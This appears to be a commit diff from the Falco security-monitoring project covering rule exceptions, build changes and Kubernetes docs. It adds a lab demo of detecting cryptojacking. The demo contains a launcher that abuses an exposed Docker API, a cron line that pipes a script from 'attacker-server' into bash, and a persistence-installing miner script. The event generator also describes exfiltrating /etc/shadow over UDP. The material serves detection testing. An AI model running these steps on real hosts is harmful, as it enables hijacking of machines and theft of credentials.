87fd4aba70 Let mesos-journald-(logger) spawn shells 2017-10-26 14:17:39 -07:00
Mark Stemm
332e3ad874 Let salt-minion spawn shells 2017-10-26 11:37:12 -07:00
Mark Stemm
5127d51732 Let python run es curator as a shell 2017-10-26 09:42:36 -07:00
Mark Stemm
d8fdaa0d88 Let seed_es_acl spawn shells. 2017-10-26 09:36:07 -07:00
Mark Stemm
b993683b96 Let java running maven spawn shells 2017-10-26 09:35:52 -07:00
Mark Stemm
b8027b5e54 Add additional shell spawn binaries 2017-10-26 09:15:36 -07:00
Mark Stemm
d57b3fe3cf Let spamd read sensitive files. 2017-10-26 09:15:18 -07:00
Mark Stemm
dd3a7df346 Let pam-auth-update/parallels inst write to /etc 2017-10-26 09:14:01 -07:00
Mark Stemm
ba1c8e4506 Let plesk installer write apache config. 2017-10-26 09:13:41 -07:00
57 changed files with 1966 additions and 764 deletions


@@ -17,6 +17,7 @@ install:
- curl -Lo avocado-36.0-tar.gz https://github.com/avocado-framework/avocado/archive/36.0lts.tar.gz
- tar -zxvf avocado-36.0-tar.gz
- cd avocado-36.0lts
+- sed -e 's/libvirt-python>=1.2.9/libvirt-python>=1.2.9,<4.1.0/' < requirements.txt > /tmp/requirements.txt && mv /tmp/requirements.txt ./requirements.txt
- sudo -H pip install -r requirements.txt
- sudo python setup.py install
- cd ../falco


@@ -2,6 +2,24 @@
This file documents all notable changes to Falco. The release numbering uses [semantic versioning](http://semver.org).
+## v0.9.0
+Released 2018-01-18
+### Bug Fixes
+* Fix driver incompatibility problems with some linux kernel versions that can disable pagefault tracepoints [[#sysdig/1034](https://github.com/draios/sysdig/pull/1034)]
+* Fix OSX Build incompatibility with latest version of libcurl [[#291](https://github.com/draios/falco/pull/291)]
+### Minor Changes
+* Updated the Kubernetes example to provide an additional example: Daemon Set using RBAC and a ConfigMap for configuration. Also expanded the documentation for both the RBAC and non-RBAC examples. [[#309](https://github.com/draios/falco/pull/309)]
+### Rule Changes
+* Refactor the shell-related rules to reduce false positives. These changes significantly decrease the scope of the rules so they trigger only for shells spawned below specific processes instead of anywhere. [[#301](https://github.com/draios/falco/pull/301)] [[#304](https://github.com/draios/falco/pull/304)]
+* Lots of rule changes based on feedback from Sysdig Secure community [[#293](https://github.com/draios/falco/pull/293)] [[#298](https://github.com/draios/falco/pull/298)] [[#300](https://github.com/draios/falco/pull/300)] [[#307](https://github.com/draios/falco/pull/307)] [[#315](https://github.com/draios/falco/pull/315)]
## v0.8.1
Released 2017-10-10


@@ -78,7 +78,7 @@ else()
set(ZLIB_INCLUDE "${ZLIB_SRC}")
set(ZLIB_LIB "${ZLIB_SRC}/libz.a")
ExternalProject_Add(zlib
URL "https://s3.amazonaws.com/download.draios.com/dependencies/zlib-1.2.8.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/zlib-1.2.8.tar.gz"
URL_MD5 "44d667c142d7cda120332623eab69f40"
CONFIGURE_COMMAND "./configure"
BUILD_COMMAND ${CMD_MAKE}
@@ -104,7 +104,7 @@ else()
set(JQ_INCLUDE "${JQ_SRC}")
set(JQ_LIB "${JQ_SRC}/.libs/libjq.a")
ExternalProject_Add(jq
URL "https://s3.amazonaws.com/download.draios.com/dependencies/jq-1.5.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/jq-1.5.tar.gz"
URL_MD5 "0933532b086bd8b6a41c1b162b1731f9"
CONFIGURE_COMMAND ./configure --disable-maintainer-mode --enable-all-static --disable-dependency-tracking
BUILD_COMMAND ${CMD_MAKE} LDFLAGS=-all-static
@@ -134,7 +134,7 @@ else()
set(CURSES_LIBRARIES "${CURSES_BUNDLE_DIR}/lib/libncurses.a")
message(STATUS "Using bundled ncurses in '${CURSES_BUNDLE_DIR}'")
ExternalProject_Add(ncurses
URL "https://s3.amazonaws.com/download.draios.com/dependencies/ncurses-6.0-20150725.tgz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/ncurses-6.0-20150725.tgz"
URL_MD5 "32b8913312e738d707ae68da439ca1f4"
CONFIGURE_COMMAND ./configure --without-cxx --without-cxx-binding --without-ada --without-manpages --without-progs --without-tests --with-terminfo-dirs=/etc/terminfo:/lib/terminfo:/usr/share/terminfo
BUILD_COMMAND ${CMD_MAKE}
@@ -161,7 +161,7 @@ else()
set(B64_INCLUDE "${B64_SRC}/include")
set(B64_LIB "${B64_SRC}/src/libb64.a")
ExternalProject_Add(b64
URL "https://s3.amazonaws.com/download.draios.com/dependencies/libb64-1.2.src.zip"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/libb64-1.2.src.zip"
URL_MD5 "a609809408327117e2c643bed91b76c5"
CONFIGURE_COMMAND ""
BUILD_COMMAND ${CMD_MAKE}
@@ -215,7 +215,7 @@ else()
message(STATUS "Using bundled openssl in '${OPENSSL_BUNDLE_DIR}'")
ExternalProject_Add(openssl
URL "https://s3.amazonaws.com/download.draios.com/dependencies/openssl-1.0.2j.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/openssl-1.0.2j.tar.gz"
URL_MD5 "96322138f0b69e61b7212bc53d5e912b"
CONFIGURE_COMMAND ./config shared --prefix=${OPENSSL_INSTALL_DIR}
BUILD_COMMAND ${CMD_MAKE}
@@ -246,7 +246,7 @@ else()
ExternalProject_Add(curl
DEPENDS openssl
URL "https://s3.amazonaws.com/download.draios.com/dependencies/curl-7.56.0.tar.bz2"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/curl-7.56.0.tar.bz2"
URL_MD5 "e0caf257103e0c77cee5be7e9ac66ca4"
CONFIGURE_COMMAND ./configure ${CURL_SSL_OPTION} --disable-shared --enable-optimize --disable-curldebug --disable-rt --enable-http --disable-ftp --disable-file --disable-ldap --disable-ldaps --disable-rtsp --disable-telnet --disable-tftp --disable-pop3 --disable-imap --disable-smb --disable-smtp --disable-gopher --disable-sspi --disable-ntlm-wb --disable-tls-srp --without-winssl --without-darwinssl --without-polarssl --without-cyassl --without-nss --without-axtls --without-ca-path --without-ca-bundle --without-libmetalink --without-librtmp --without-winidn --without-libidn --without-nghttp2 --without-libssh2 --disable-threaded-resolver
BUILD_COMMAND ${CMD_MAKE}
@@ -280,7 +280,7 @@ else()
set(LUAJIT_INCLUDE "${LUAJIT_SRC}")
set(LUAJIT_LIB "${LUAJIT_SRC}/libluajit.a")
ExternalProject_Add(luajit
URL "https://s3.amazonaws.com/download.draios.com/dependencies/LuaJIT-2.0.3.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/LuaJIT-2.0.3.tar.gz"
URL_MD5 "f14e9104be513913810cd59c8c658dc0"
CONFIGURE_COMMAND ""
BUILD_COMMAND ${CMD_MAKE}
@@ -310,7 +310,7 @@ else()
endif()
ExternalProject_Add(lpeg
DEPENDS ${LPEG_DEPENDENCIES}
URL "https://s3.amazonaws.com/download.draios.com/dependencies/lpeg-1.0.0.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/lpeg-1.0.0.tar.gz"
URL_MD5 "0aec64ccd13996202ad0c099e2877ece"
BUILD_COMMAND LUA_INCLUDE=${LUAJIT_INCLUDE} "${PROJECT_SOURCE_DIR}/scripts/build-lpeg.sh" "${LPEG_SRC}/build"
BUILD_IN_SOURCE 1
@@ -345,7 +345,7 @@ else()
set(LIBYAML_LIB "${LIBYAML_SRC}/.libs/libyaml.a")
message(STATUS "Using bundled libyaml in '${LIBYAML_SRC}'")
ExternalProject_Add(libyaml
URL "https://s3.amazonaws.com/download.draios.com/dependencies/libyaml-0.1.4.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/libyaml-0.1.4.tar.gz"
URL_MD5 "4a4bced818da0b9ae7fc8ebc690792a7"
BUILD_COMMAND ${CMD_MAKE}
BUILD_IN_SOURCE 1
@@ -381,7 +381,7 @@ else()
endif()
ExternalProject_Add(lyaml
DEPENDS ${LYAML_DEPENDENCIES}
URL "https://s3.amazonaws.com/download.draios.com/dependencies/lyaml-release-v6.0.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/lyaml-release-v6.0.tar.gz"
URL_MD5 "dc3494689a0dce7cf44e7a99c72b1f30"
BUILD_COMMAND ${CMD_MAKE}
BUILD_IN_SOURCE 1


@@ -2,7 +2,7 @@
#### Latest release
-**v0.8.1**
+**v0.9.0**
Read the [change log](https://github.com/draios/falco/blob/dev/CHANGELOG.md)
Dev Branch: [![Build Status](https://travis-ci.org/draios/falco.svg?branch=dev)](https://travis-ci.org/draios/falco)<br />


@@ -1,3 +1,4 @@
/etc/falco/falco.yaml
/etc/falco/falco_rules.yaml
+/etc/falco/application_rules.yaml
/etc/falco/falco_rules.local.yaml


@@ -14,8 +14,7 @@ RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
-RUN echo "deb http://httpredir.debian.org/debian jessie main" > /etc/apt/sources.list.d/jessie.list \
-&& apt-get update \
+RUN apt-get update \
&& apt-get install -y --no-install-recommends \
bash-completion \
curl \
@@ -24,18 +23,11 @@ RUN echo "deb http://httpredir.debian.org/debian jessie main" > /etc/apt/sources
ca-certificates \
gcc \
gcc-5 \
-gcc-4.9 && rm -rf /var/lib/apt/lists/*
+gdb && rm -rf /var/lib/apt/lists/*
-# Since our base Debian image ships with GCC 5.0 which breaks older kernels, revert the
-# default to gcc-4.9. Also, since some customers use some very old distributions whose kernel
-# makefile is hardcoded for gcc-4.6 or so (e.g. Debian Wheezy), we pretend to have gcc 4.6/4.7
-# by symlinking it to 4.9
-RUN rm -rf /usr/bin/gcc \
-&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc \
-&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.8 \
-&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.7 \
-&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.6
+# Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
+# default to gcc-5.
+RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc
RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
&& curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \


@@ -50,6 +50,8 @@ void usage(char *program)
printf(" then read a sensitive file\n");
printf(" write_rpm_database Write to files below /var/lib/rpm\n");
printf(" spawn_shell Run a shell (bash)\n");
printf(" Used by spawn_shell_under_httpd below\n");
printf(" spawn_shell_under_httpd Run a shell (bash) under a httpd process\n");
printf(" db_program_spawn_process As a database program, try to spawn\n");
printf(" another program\n");
printf(" modify_binary_dirs Modify a file below /bin\n");
@@ -64,7 +66,7 @@ void usage(char *program)
printf(" non_sudo_setuid Setuid as a non-root user\n");
printf(" create_files_below_dev Create files below /dev\n");
printf(" exec_ls execve() the program ls\n");
printf(" (used by user_mgmt_binaries below)\n");
printf(" (used by user_mgmt_binaries, db_program_spawn_process)\n");
printf(" user_mgmt_binaries Become the program \"vipw\", which triggers\n");
printf(" rules related to user management programs\n");
printf(" exfiltration Read /etc/shadow and send it via udp to a\n");
@@ -230,9 +232,14 @@ void spawn_shell() {
}
}
+void spawn_shell_under_httpd() {
+printf("Becoming the program \"httpd\" and then spawning a shell\n");
+respawn("./httpd", "spawn_shell", "0");
+}
void db_program_spawn_process() {
-printf("Becoming the program \"mysql\" and then spawning a shell\n");
-respawn("./mysqld", "spawn_shell", "0");
+printf("Becoming the program \"mysql\" and then running ls\n");
+respawn("./mysqld", "exec_ls", "0");
}
void modify_binary_dirs() {
@@ -360,6 +367,7 @@ map<string, action_t> defined_actions = {{"write_binary_dir", write_binary_dir},
{"read_sensitive_file_after_startup", read_sensitive_file_after_startup},
{"write_rpm_database", write_rpm_database},
{"spawn_shell", spawn_shell},
{"spawn_shell_under_httpd", spawn_shell_under_httpd},
{"db_program_spawn_process", db_program_spawn_process},
{"modify_binary_dirs", modify_binary_dirs},
{"mkdir_binary_dirs", mkdir_binary_dirs},
@@ -375,7 +383,7 @@ map<string, action_t> defined_actions = {{"write_binary_dir", write_binary_dir},
// Some actions don't directly result in suspicious behavior. These
// actions are excluded from the ones run with -a all.
set<string> exclude_from_all_actions = {"exec_ls", "network_activity"};
set<string> exclude_from_all_actions = {"spawn_shell", "exec_ls", "network_activity"};
void create_symlinks(const char *program)
{


@@ -14,8 +14,7 @@ RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
-RUN echo "deb http://httpredir.debian.org/debian jessie main" > /etc/apt/sources.list.d/jessie.list \
-&& apt-get update \
+RUN apt-get update \
&& apt-get install -y --no-install-recommends \
bash-completion \
curl \
@@ -24,19 +23,11 @@ RUN echo "deb http://httpredir.debian.org/debian jessie main" > /etc/apt/sources
ca-certificates \
gcc \
gcc-5 \
-gcc-4.9 \
dkms && rm -rf /var/lib/apt/lists/*
-# Since our base Debian image ships with GCC 5.0 which breaks older kernels, revert the
-# default to gcc-4.9. Also, since some customers use some very old distributions whose kernel
-# makefile is hardcoded for gcc-4.6 or so (e.g. Debian Wheezy), we pretend to have gcc 4.6/4.7
-# by symlinking it to 4.9
-RUN rm -rf /usr/bin/gcc \
-&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc \
-&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.8 \
-&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.7 \
-&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.6
+# Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
+# default to gcc-5.
+RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc
RUN ln -s $SYSDIG_HOST_ROOT/lib/modules /lib/modules


@@ -14,8 +14,7 @@ RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
-RUN echo "deb http://httpredir.debian.org/debian jessie main" > /etc/apt/sources.list.d/jessie.list \
-&& apt-get update \
+RUN apt-get update \
&& apt-get install -y --no-install-recommends \
bash-completion \
curl \
@@ -23,19 +22,11 @@ RUN echo "deb http://httpredir.debian.org/debian jessie main" > /etc/apt/sources
ca-certificates \
gnupg2 \
gcc \
-gcc-5 \
-gcc-4.9 && rm -rf /var/lib/apt/lists/*
+gcc-5 && rm -rf /var/lib/apt/lists/*
-# Since our base Debian image ships with GCC 5.0 which breaks older kernels, revert the
-# default to gcc-4.9. Also, since some customers use some very old distributions whose kernel
-# makefile is hardcoded for gcc-4.6 or so (e.g. Debian Wheezy), we pretend to have gcc 4.6/4.7
-# by symlinking it to 4.9
-RUN rm -rf /usr/bin/gcc \
-&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc \
-&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.8 \
-&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.7 \
-&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.6
+# Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
+# default to gcc-5.
+RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc
RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
&& curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \


@@ -0,0 +1,117 @@
# Demo of Falco Detecting Cryptomining Exploit
## Introduction
Based on a [blog post](https://sysdig.com/blog/detecting-cryptojacking/) we wrote, this example shows how an overly permissive container environment can be exploited to install cryptomining software and how use of the exploit can be detected using Sysdig Falco.
Although the exploit in the blog post involved modifying the cron configuration on the host filesystem, in this example we keep the host filesystem untouched. Instead, we have a container play the role of the "host", and set up everything using [docker-compose](https://docs.docker.com/compose/) and [docker-in-docker](https://hub.docker.com/_/docker/).
## Requirements
In order to run this example, you need Docker Engine >= 1.13.0 and docker-compose >= 1.10.0, as well as curl.
## Example architecture
The example consists of the following:
* `host-machine`: A docker-in-docker instance that plays the role of the host machine. It runs a cron daemon and an independent copy of the docker daemon that listens on port 2375. This port is exposed to the world, and this port is what the attacker will use to install new software on the host.
* `attacker-server`: An nginx instance that serves the malicious files and scripts used by the attacker.
* `falco`: A Falco instance to detect the suspicious activity. It connects to the docker daemon on `host-machine` to fetch container information.
All of the above are configured in the docker-compose file [demo.yml](./demo.yml).
A separate container is created to launch the attack:
* `docker123321-mysql`: An [alpine](https://hub.docker.com/_/alpine/) container that mounts /etc from `host-machine` into /mnt/etc within the container. The json container description is in the file [docker123321-mysql-container.json](./docker123321-mysql-container.json).
## Example Walkthrough
### Start everything using docker-compose
To make sure you're starting from scratch, first run `docker-compose -f demo.yml down -v` to remove any existing containers, volumes, etc.
Then run `docker-compose -f demo.yml up --build` to create the `host-machine`, `attacker-server`, and `falco` containers.
You will see fairly verbose output from dockerd:
```
host-machine_1 | crond: crond (busybox 1.27.2) started, log level 6
host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="starting containerd" module=containerd revision=9b55aab90508bd389d7654c4baf173a981477d55 version=v1.0.1
host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.content.v1.content"..." module=containerd type=io.containerd.content.v1
host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.snapshotter.v1.btrfs"..." module=containerd type=io.containerd.snapshotter.v1
```
When you see log output like the following, you know that falco is started and ready:
```
falco_1 | Wed Mar 14 22:37:12 2018: Falco initialized with configuration file /etc/falco/falco.yaml
falco_1 | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.yaml
falco_1 | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.local.yaml
```
### Launch malicious container
To launch the malicious container, we will connect to the docker instance running in `host-machine`, which has exposed port 2375 to the world. We create and start a container via direct use of the docker API (although you can do the same via `docker -H localhost:2375 run ...`).
The script `launch_malicious_container.sh` performs the necessary POSTs:
* `http://localhost:2375/images/create?fromImage=alpine&tag=latest`
* `http://localhost:2375/containers/create?&name=docker123321-mysql`
* `http://localhost:2375/containers/docker123321-mysql/start`
Run the script via `bash launch_malicious_container.sh`.
### Examine cron output as malicious software is installed & run
`docker123321-mysql` writes the following line to `/mnt/etc/crontabs/root`, which corresponds to `/etc/crontabs/root` on the host:
```
* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s
```
It also touches the file `/mnt/etc/crontabs/cron.update`, which corresponds to `/etc/crontabs/cron.update` on the host, to force cron to re-read its configuration. This ensures that every minute, cron will download the script (disguised as [logo3.jpg](attacker_files/logo3.jpg)) from `attacker-server` and run it.
You can see `docker123321-mysql` running by checking the container list for the docker instance running in `host-machine` via `docker -H localhost:2375 ps`. You should see output like the following:
```
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
68ed578bd034 alpine:latest "/bin/sh -c 'echo '*…" About a minute ago Up About a minute docker123321-mysql
```
Once the cron job runs, you will see output like the following:
```
host-machine_1 | crond: USER root pid 187 cmd curl -s http://attacker-server:8220/logo3.jpg | bash -s
host-machine_1 | ***Checking for existing Miner program
attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /logo3.jpg HTTP/1.1" 200 1963 "-" "curl/7.58.0" "-"
host-machine_1 | ***Killing competing Miner programs
host-machine_1 | ***Reinstalling cron job to run Miner program
host-machine_1 | ***Configuring Miner program
attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /config_1.json HTTP/1.1" 200 50 "-" "curl/7.58.0" "-"
attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /minerd HTTP/1.1" 200 87 "-" "curl/7.58.0" "-"
host-machine_1 | ***Configuring system for Miner program
host-machine_1 | vm.nr_hugepages = 9
host-machine_1 | ***Running Miner program
host-machine_1 | ***Ensuring Miner program is alive
host-machine_1 | 238 root 0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
host-machine_1 | /var/tmp
host-machine_1 | runing.....
host-machine_1 | ***Ensuring Miner program is alive
host-machine_1 | 238 root 0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
host-machine_1 | /var/tmp
host-machine_1 | runing.....
```
### Observe Falco detecting malicious activity
To observe Falco detecting the malicious activity, you can look for `falco_1` lines in the output. Falco will detect the container launch with the sensitive mount:
```
falco_1 | 22:37:24.478583438: Informational Container with sensitive mount started (user=root command=runc:[1:CHILD] init docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
falco_1 | 22:37:24.479565025: Informational Container with sensitive mount started (user=root command=sh -c echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && sleep 300 docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
```
### Cleanup
To tear down the environment, stop the script using ctrl-C and remove everything using `docker-compose -f demo.yml down -v`.


@@ -0,0 +1,14 @@
server {
listen 8220;
server_name localhost;
location / {
root /usr/share/nginx/html;
index index.html index.htm;
}
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root /usr/share/nginx/html;
}
}


@@ -0,0 +1 @@
{"config": "some-bitcoin-miner-config-goes-here"}


@@ -0,0 +1,64 @@
#!/bin/sh
echo "***Checking for existing Miner program"
ps -fe|grep jaav |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
echo "***Killing competing Miner programs"
rm -rf /var/tmp/ysjswirmrm.conf
rm -rf /var/tmp/sshd
ps auxf|grep -v grep|grep -v ovpvwbvtat|grep "/tmp/"|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "ysjswirmrm"|awk '{print $2}'|xargs -r kill -9
echo "***Reinstalling cron job to run Miner program"
crontab -r || true && \
echo "* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true
echo "***Configuring Miner program"
curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json
curl -so /var/tmp/jaav http://attacker-server:8220/minerd
chmod 777 /var/tmp/jaav
cd /var/tmp
echo "***Configuring system for Miner program"
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=$num
echo "***Running Miner program"
nohup ./jaav -c config.json -t `echo $cores` >/dev/null &
fi
echo "***Ensuring Miner program is alive"
ps -fe|grep jaav |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
echo "***Reconfiguring Miner program"
curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json
curl -so /var/tmp/jaav http://attacker-server:8220/minerd
chmod 777 /var/tmp/jaav
cd /var/tmp
echo "***Reconfiguring system for Miner program"
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=$num
echo "***Restarting Miner program"
nohup ./jaav -c config.json -t `echo $cores` >/dev/null &
fi
echo "runing....."

View File

@@ -0,0 +1,8 @@
#!/bin/bash
while true; do
    echo "Mining bitcoins..."
    sleep 60
done

View File

@@ -0,0 +1,41 @@
version: '3'

volumes:
  host-filesystem:
  docker-socket:

services:
  host-machine:
    privileged: true
    build:
      context: ${PWD}/host-machine
      dockerfile: ${PWD}/host-machine/Dockerfile
    volumes:
      - host-filesystem:/etc
      - docker-socket:/var/run
    ports:
      - "2375:2375"
    depends_on:
      - "falco"

  attacker-server:
    image: nginx:latest
    ports:
      - "8220:8220"
    volumes:
      - ${PWD}/attacker_files:/usr/share/nginx/html
      - ${PWD}/attacker-nginx.conf:/etc/nginx/conf.d/default.conf
    depends_on:
      - "falco"

  falco:
    image: sysdig/falco:latest
    privileged: true
    volumes:
      - docker-socket:/host/var/run
      - /dev:/host/dev
      - /proc:/host/proc:ro
      - /boot:/host/boot:ro
      - /lib/modules:/host/lib/modules:ro
      - /usr:/host/usr:ro
    tty: true

View File

@@ -0,0 +1,7 @@
{
  "Cmd": ["/bin/sh", "-c", "echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && touch /mnt/etc/crontabs/cron.update && sleep 300"],
  "Image": "alpine:latest",
  "HostConfig": {
    "Binds": ["/etc:/mnt/etc"]
  }
}

View File

@@ -0,0 +1,12 @@
FROM docker:stable-dind
RUN set -ex \
    && apk add --no-cache \
       bash curl
COPY start-cron-and-dind.sh /usr/local/bin
ENTRYPOINT ["start-cron-and-dind.sh"]
CMD []

View File

@@ -0,0 +1,11 @@
#!/bin/sh
# Start docker-in-docker, but backgrounded with its output still going
# to stdout/stderr.
dockerd-entrypoint.sh &
# Start cron in the foreground with a moderate level of debugging to
# see job output.
crond -f -d 6

View File

@@ -0,0 +1,14 @@
#!/bin/sh
echo "Pulling alpine:latest image to docker-in-docker instance"
curl -X POST 'http://localhost:2375/images/create?fromImage=alpine&tag=latest'
echo "Creating container mounting /etc from host-machine"
curl -H 'Content-Type: application/json' -d @docker123321-mysql-container.json -X POST 'http://localhost:2375/containers/create?&name=docker123321-mysql'
echo "Running container mounting /etc from host-machine"
curl -H 'Content-Type: application/json' -X POST 'http://localhost:2375/containers/docker123321-mysql/start'

View File

@@ -1,5 +1,92 @@
# Example K8s Services for Falco
# Example Kubernetes Daemon Sets for Sysdig Falco
The yaml file in this directory installs the following:
- Open Source Falco, as a DaemonSet. Falco is configured to communicate with the K8s API server via its service account, and changes its output to be K8s-friendly. It also sends to a slack webhook for the `#demo-falco-alerts` channel on our [public slack](https://sysdig.slack.com/messages/demo-falco-alerts/).
- The [Falco Event Generator](https://github.com/draios/falco/wiki/Generating-Sample-Events), as a deployment that ensures it runs on exactly 1 node.
This directory gives you the YAML files required to stand up Sysdig Falco on Kubernetes as a Daemon Set. A Falco Pod is deployed to each node, giving you the ability to monitor any running containers for abnormal behavior.
Two options are provided for deploying the Daemon Set:
- `k8s-with-rbac` - Deploys the Daemon Set on a Kubernetes cluster with RBAC enabled.
- `k8s-without-rbac` - Deploys the Daemon Set on a Kubernetes cluster without RBAC enabled.
Also provided:
- `falco-event-generator-deployment.yaml` - A Kubernetes Deployment to generate sample events. This is useful for testing, but note it will generate a large number of events.
## Deploying to Kubernetes with RBAC enabled
RBAC has been available in Kubernetes since v1.8, and running with RBAC enabled is considered best practice. The `k8s-with-rbac` directory provides the YAML to create a Service Account for Falco, as well as the ClusterRole and ClusterRoleBinding that grant the appropriate permissions to the Service Account.
```
k8s-using-daemonset$ kubectl create -f k8s-with-rbac/falco-account.yaml
serviceaccount "falco-account" created
clusterrole "falco-cluster-role" created
clusterrolebinding "falco-cluster-role-binding" created
k8s-using-daemonset$
```
The Daemon Set also relies on a Kubernetes ConfigMap to store the Falco configuration and make it available to the Falco Pods. This allows you to manage custom configuration without rebuilding and redeploying the underlying Pods. To create the ConfigMap, you'll first need to copy the required configuration files from their location in this GitHub repo to the `k8s-with-rbac/falco-config/` directory. Make any modifications to these copies rather than the original files.
```
k8s-using-daemonset$ cp ../../falco.yaml k8s-with-rbac/falco-config/
k8s-using-daemonset$ cp ../../rules/falco_rules.* k8s-with-rbac/falco-config/
```
If you want to send Falco alerts to a Slack channel, modify the `falco.yaml` file to point at your Slack webhook. For more information on getting a webhook URL for your Slack team, refer to the [Slack documentation](https://api.slack.com/incoming-webhooks). To enable Slack messages, add the following to the bottom of the `falco.yaml` config file you just copied.
```
program_output:
enabled: true
keep_alive: false
program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/see_your_slack_team/apps_settings_for/a_webhook_url"
```
You will also need to enable JSON output. Find the `json_output: false` setting in the `falco.yaml` file and change it to `json_output: true`. Any custom rules for your environment can be added to the `falco_rules.local.yaml` file and they will be picked up by Falco at start time. After these edits, the relevant portion of your copied `falco.yaml` should read as follows (with the placeholder webhook URL from above):
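```
json_output: true
program_output:
  enabled: true
  keep_alive: false
  program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/see_your_slack_team/apps_settings_for/a_webhook_url"
```
You can now create the ConfigMap in Kubernetes.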
```
k8s-using-daemonset$ kubectl create configmap falco-config --from-file=k8s-with-rbac/falco-config
configmap "falco-config" created
k8s-using-daemonset$
```
Now that the requirements for our Daemon Set are in place, we can create it.
```
k8s-using-daemonset$ kubectl create -f k8s-with-rbac/falco-daemonset-configmap.yaml
daemonset "falco" created
k8s-using-daemonset$
```
## Deploying to Kubernetes without RBAC enabled
If you are running Kubernetes with Legacy Authorization enabled, you can use `kubectl` to deploy the Daemon Set provided in the `k8s-without-rbac` directory. The example provides the ability to post messages to a Slack channel via a webhook. For more information on getting a webhook URL for your Slack team, refer to the [Slack documentation](https://api.slack.com/incoming-webhooks). Modify the [`args`](https://github.com/draios/falco/blob/dev/examples/k8s-using-daemonset/falco-daemonset.yaml#L21) passed to the Falco container to point to the appropriate URL for your webhook.
```
k8s-using-daemonset$ kubectl create -f k8s-without-rbac/falco-daemonset.yaml
```
## Verifying the installation
To verify that Falco is working correctly, launch a shell in one of the Pods. You should then see a message in your Slack channel (if configured) and in the logs of the Falco pod.
```
k8s-using-daemonset$ kubectl get pods
NAME READY STATUS RESTARTS AGE
